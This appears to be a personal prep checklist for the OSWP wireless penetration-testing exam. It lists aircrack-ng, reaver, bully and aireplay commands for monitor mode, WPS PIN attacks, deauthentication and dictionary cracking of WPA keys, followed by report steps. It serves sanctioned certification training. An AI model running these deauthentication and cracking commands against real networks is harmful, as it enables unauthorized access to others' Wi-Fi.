Offensive Security Wireless Professional

##System Prerequisites

-Make sure to have a webcamera

-Make sure to update all drivers beforehand to screenshare screens for proctoring

-Make sure to have a quiet environment with a stable internet connection

-Have either a Kali VM or a Kali baremetal prepared

## Preliminary: Connect to Test Environment (5 minutes)


tar xvfz exam-connection.tar.bz2

sudo openvpn OS-XXXXXX-OSWP.ovpn

**Credentials:** Add username and password from email.


Use the software on their provided Kali


### 1. Environment Setup (5 minutes)


sudo airmon-ng

**Screenshot:** List of available wireless interfaces.


### 2. Monitoring Mode (5 minutes)


sudo airmon-ng start wlan1

**Screenshot:** Confirm monitoring mode.


### 3. Scanning Networks (5 minutes)


sudo airodump-ng wlan1mon

**Screenshot:** All visible networks.

#### Fine-Tuning (5 minutes)


sudo airodump-ng wlan1mon -c [Channel] -w ssid

**Screenshot:** Refined search.


### 4. The Hack (40 minutes)

#### WPS (20 minutes)


sudo reaver -i wlan1mon -b [BSSID] -vv

sudo bully wlan1mon -b [BSSID] -c [Channel] --force

**Screenshot:** Cracked WPS PIN and WPA key.

#### WPA/PSK2 (20 minutes)


sudo aireplay-ng -0 6 -a [BSSID] wlan1mon

**Screenshot:** Deauthentication packets.

#### WPA-MGT (20 minutes)

make a rogue hotspot

Based on the following auth methods use a different host.conf file





### 5. The Capture (10 minutes)

**Screenshot:** Handshake or sufficient data.


### 6. The Crack (20 minutes)


sudo aircrack-ng -w /etc/share/wordlists/rockyou.txt hash.txt

**Screenshot:** Cracked password.


### 7. Connect to Cracked Network (10 minutes)

**For WEP:**

sudo iwconfig wlan0 essid [ESSID] key [WEP Key]

sudo dhclient wlan0

**For WPA/WPA2:**

sudo wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B

sudo dhclient wlan0

**Screenshot:** Successful connection.


### 8. The Flag (5 minutes)

**Access Proof:** ``

**Screenshot:** Proof.


### 9.1 Exporting Obsidian Notes for Report (5 minutes)

**Export Notes**: In Obsidian, go to the note you want to export, click on the three-dot menu, and choose `Export → Export as Markdown (.md)`.


### 9.2 Generating the Final Report Using OSCP Exam Report Generator (10 minutes)

**Clone Repository**: 


git clone https://github.com/initinfosec/OSCP-Exam-Report-Template-Markdown.git


**Install Required Software and Template**: 


**Copy Markdown Report**: Paste your exported Obsidian notes into the template, below the header.

**Generate PDF and Archive**: 

ruby generate.rb

**Manual Verification**: Check PDF and 7z archive for accuracy.


## Final Reporting and Submission (15 minutes)

**7z Archiving:**


7z a -t7z OSWP-XXXXXX-Exam-Report.7z OSWP-XXXXXX-Exam-Report.pdf



- Upload at `https://upload.offsec.com`.

- Verify the MD5 hash.

**Confirmation:** Check email for upload success.

Old Edits

Prep notes for the exam

Getting set up

The Hack 

Two major components of Wi-Fi hacking

The Crack

Aircrack-ng -w etc/share/wordlists/rockyou.txt hash.txt 

The Flag

Go to


Refined version

1. Environment Setup

2. Monitoring Mode

3. Scanning Networks

4. WEP Cracking

Capture Data Packets

ARP Replay Attack

Crack WEP Key

5. WPA/WPA2 Cracking

Capture Handshake

Deauthenticate Client

Dictionary Attack

6. Connecting to Cracked Networks

7. Final Reporting

Focus on these aspects and practice as much as possible to be well-prepared for the OSWP exam.